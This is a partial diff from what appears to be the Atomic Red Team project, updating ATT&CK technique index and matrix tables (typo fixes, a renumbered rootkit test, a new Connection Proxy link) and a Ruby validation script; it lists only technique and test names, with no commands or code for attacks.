+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
 | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](./T1083/T1083.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Spearphishing Attachment](./T1193/T1193.md) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Files](./T1081/T1081.md) | [Network Service Scanning](./T1046/T1046.md) | [Logon Scripts](./T1037/T1037.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](./T1088/T1088.md) | [Clear Command History](./T1146/T1146.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Share Discovery](./T1135/T1135.md) | [Pass the Hash](./T1075/T1075.md) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |

atomics/windows-index.md

@@ -43,7 +43,7 @@
   - Atomic Test #10: Create ADS PowerShell [windows]
 - [T1183 Image File Execution Options Injection](./T1183/T1183.md)
   - Atomic Test #1: IFEO Add Debugger [windows]
-  - Atomic Test #2: IFEO GLobal Flags [windows]
+  - Atomic Test #2: IFEO Global Flags [windows]
 - T1054 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1070 Indicator Removal on Host](./T1070/T1070.md)
@@ -84,7 +84,7 @@
   - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
   - Atomic Test #3: Regsvr32 local DLL execution [windows]
 - [T1014 Rootkit](./T1014/T1014.md)
-  - Atomic Test #4: Windows Signed Driver Rootkit Test [windows]
+  - Atomic Test #3: Windows Signed Driver Rootkit Test [windows]
 - [T1085 Rundll32](./T1085/T1085.md)
   - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
 - T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -127,7 +127,7 @@
   - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
 - [T1183 Image File Execution Options Injection](./T1183/T1183.md)
   - Atomic Test #1: IFEO Add Debugger [windows]
-  - Atomic Test #2: IFEO GLobal Flags [windows]
+  - Atomic Test #2: IFEO Global Flags [windows]
 - [T1050 New Service](./T1050/T1050.md)
   - Atomic Test #1: Service Installation [windows]
   - Atomic Test #2: Service Installation PowerShell Installs A Local Service using PowerShell [windows]
@@ -188,7 +188,7 @@
   - Atomic Test #1: Installing Hyper-V Feature [windows]
 - [T1183 Image File Execution Options Injection](./T1183/T1183.md)
   - Atomic Test #1: IFEO Add Debugger [windows]
-  - Atomic Test #2: IFEO GLobal Flags [windows]
+  - Atomic Test #2: IFEO Global Flags [windows]
 - T1177 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1037 Logon Scripts](./T1037/T1037.md)
   - Atomic Test #1: Logon Scripts [windows]
@@ -443,7 +443,7 @@
 # command-and-control
 - T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1090 Connection Proxy](./T1090/T1090.md)
 - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1132 Data Encoding](./T1132/T1132.md)

atomics/windows-matrix.md

@@ -3,7 +3,7 @@
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Brute Force](./T1110/T1110.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
 | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Spearphishing Attachment](./T1193/T1193.md) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Service Scanning](./T1046/T1046.md) | [Pass the Hash](./T1075/T1075.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | [Bypass User Account Control](./T1088/T1088.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](./T1135/T1135.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |

bin/validate-atomics.rb

@@ -9,7 +9,7 @@ ATOMIC_TEST_TEMPLATE = "#{File.dirname(File.dirname(__FILE__))}/atomic_red_team/
 oks = []
 fails = []
 
-(ATOMIC_RED_TEAM.atomic_test_paths + [ATOMIC_TEST_TEMPLATE]).each do |path|
+ATOMIC_RED_TEAM.atomic_test_paths.each do |path|
   begin
     print "Validating #{path}..."
     YAML.load_file(path)